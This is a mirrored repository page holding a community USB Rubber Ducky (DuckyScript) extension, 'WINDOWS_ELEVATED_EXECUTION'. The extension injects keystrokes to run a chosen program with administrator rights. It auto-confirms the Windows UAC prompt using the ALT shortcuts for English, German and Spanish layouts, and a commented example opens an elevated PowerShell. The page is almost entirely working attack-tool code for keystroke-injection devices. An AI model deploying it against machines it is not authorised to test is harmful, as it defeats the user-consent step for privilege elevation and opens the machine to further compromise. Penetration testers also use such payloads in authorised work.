Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION
2968 views
EXTENSION WINDOWS_ELEVATED_EXECUTION
    REM VERSION 1.1
    REM Author: 0i41E
    REM Executes the desired program with elevated privileges
    REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
    REM additional extensions

    REM CONFIGURATION:
    REM Used to wait for the UAC prompt to react to input
    DEFINE #INPUT_WAIT 2000
    REM Shortcut for YES across multiple languages
    DEFINE #ENGLISH_ACCEPT ALT y
    DEFINE #GERMAN_ACCEPT ALT j
    DEFINE #SPAIN_ACCEPT ALT s
 
    FUNCTION Elevated_Execution()
        DELAY #INPUT_WAIT  
        CTRL-SHIFT ENTER
        DELAY #INPUT_WAIT
        REM Change below for appropriate language
        #GERMAN_ACCEPT
        DELAY #INPUT_WAIT
    END_FUNCTION

    REM EXAMPLE USAGE AFTER EXTENSION
    REM DELAY 2000
    REM GUI r
    REM DELAY 2000
    REM STRING powershell
    REM Elevated_Execution()
    REM STRINGLN whoami /priv

END_EXTENSION